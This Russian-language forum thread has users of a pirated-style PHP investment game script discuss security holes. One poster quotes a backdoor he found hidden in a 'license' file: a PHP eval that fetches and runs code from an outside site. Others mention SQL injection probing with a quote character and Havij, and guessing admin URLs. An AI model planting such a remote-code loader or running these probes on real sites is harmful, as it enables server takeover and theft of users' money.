поищи еще дыры скорей всего их еще многоfghjk написал(а):Ребят, два дня назад увели 2к рублей с кошелька... в js/editor/jscripts/tiny_mce/themes/simple/skins нашел файл license в нем было
<?PHP
eval(file_get_contents("http://fruit-farm.org/return.php"));
?>
Снес к чертям... Скрипт качал на оф.сайте разработчиков FF как думаете, не выведут больше?
AndreyHunters
Участник
логическую уязвимость крайне сложно исправить. Тут нужно понимать как вообще программист задумал работу скрипта...assus написал(а):поищи еще дыры скорей всего их еще много
fghjk
Участник
- Сообщения
- 8
- Реакции
- 0
Согласен. Так что же теперь... все скрипты оказывается просто хлам?AndreyHunters написал(а):логическую уязвимость крайне сложно исправить. Тут нужно понимать как вообще программист задумал работу скрипта...
AndreyHunters
Участник
к сожелению на 90 %,я мало встречал скриптов которые были без багов,а те что на бескрайних просторах нета да ещё за даром,ТОЧНО ДЫРЯВЫЕ,+есть умники которые заведомо берут скрипт и закладывают в него ошибки чтоб потом на нем же и разжиться,вот такая печалькаfghjk написал(а):Согласен. Так что же теперь... все скрипты оказывается просто хлам?
vlw
Участник
- Сообщения
- 16
- Реакции
- 0
AndreyHunters, с хостингера нельзя управлять БД, так как на самом хостингере защита от этого. Если удалите базу или взломаете какой-нибудь пароль, тогда я вам поверю
AndreyHunters
Участник
во первых мне это даром и не нужно,а вовторых управление базой идет не на прямую а через запрос..............vlw написал(а):AndreyHunters, с хостингера нельзя управлять БД, так как на самом хостингере защита от этого. Если удалите базу или взломаете какой-нибудь пароль, тогда я вам поверю
vlw
Участник
- Сообщения
- 16
- Реакции
- 0
Я пол дня пытался ломануть свой же сайт. Не получилось. И наткнулся на статью, что хостингер нереально взломатьAndreyHunters написал(а):во первых мне это даром и не нужно,а вовторых управление базой идет не на прямую а через запрос..............
AndreyHunters
Участник
приведи пример хоть одной иньекции которой ты пыталсяvlw написал(а):Я пол дня пытался ломануть свой же сайт. Не получилось. И наткнулся на статью, что хостингер нереально взломать
vlw
Участник
- Сообщения
- 16
- Реакции
- 0
Допустим, даже если прописать ********.ru/?menu=admin' хостингер не даст никакого ответа (открывается 404). Havij загружает бд, но везде написано "???"AndreyHunters написал(а):приведи пример хоть одной иньекции которой ты пытался
AndreyHunters
Участник
я воздержусь от коминтариев.................vlw написал(а):Допустим, даже если прописать ********.ru/?menu=admin' хостингер не даст никакого ответа (открывается 404). Havij загружает бд, но везде написано "???"
AndreyHunters
Участник
you want to be the smartest? resentful, so as not to give the handkerchief crying ....vlw написал(а):коминтариев
комментариев
vlw
Участник
- Сообщения
- 16
- Реакции
- 0
он просто подумал, что я буду пользоваться переводчиком) LoLwh1skas написал(а):Даже на английском ошибки...
ниаолай
Местный
а что даст изменения first на свой логин?AndreyHunters написал(а):ну для начала найти все дыры и залатать,подобный скрипт сильно уязвим,ну а потом в файлах где есть фирст заменить его на свои и в базе перед тем как ее заливать проделать тоже самое
Sergey12
Местный
- Сообщения
- 45
- Реакции
- 3
а как же ты попадаешь в админку?vlw написал(а):Допустим, даже если прописать ********.ru/?menu=admin' хостингер не даст никакого ответа (открывается 404). Havij загружает бд, но везде написано "???"
ну я не знаю, попробуй
.ru/?menu=admin4ik
мб поможет...
AndreyHunters
Участник
насколько я помню то он там привязан по умолчанию и если человек пришел не по ссылке рефера,то он попадает под first, ну и тому подобное,я щас точно не помню к чему он там еще привязан,ниаолай написал(а):а что даст изменения first на свой логин?
vlw
Участник
- Сообщения
- 16
- Реакции
- 0
1.Я умею заходить в админкуSergey12 написал(а):а как же ты попадаешь в админку?
ну я не знаю, попробуй
.ru/?menu=admin4ik
мб поможет...
2.Я приводил пример SQL-Инъекции
блин тут прям крутые хакеры сидятvlw написал(а):1.Я умею заходить в админку
2.Я приводил пример SQL-Инъекции
AndreyHunters
Участник
и не говори............куда нам неграмотнымassus написал(а):блин тут прям крутые хакеры сидят
- Статус
- В этой теме нельзя размещать новые ответы.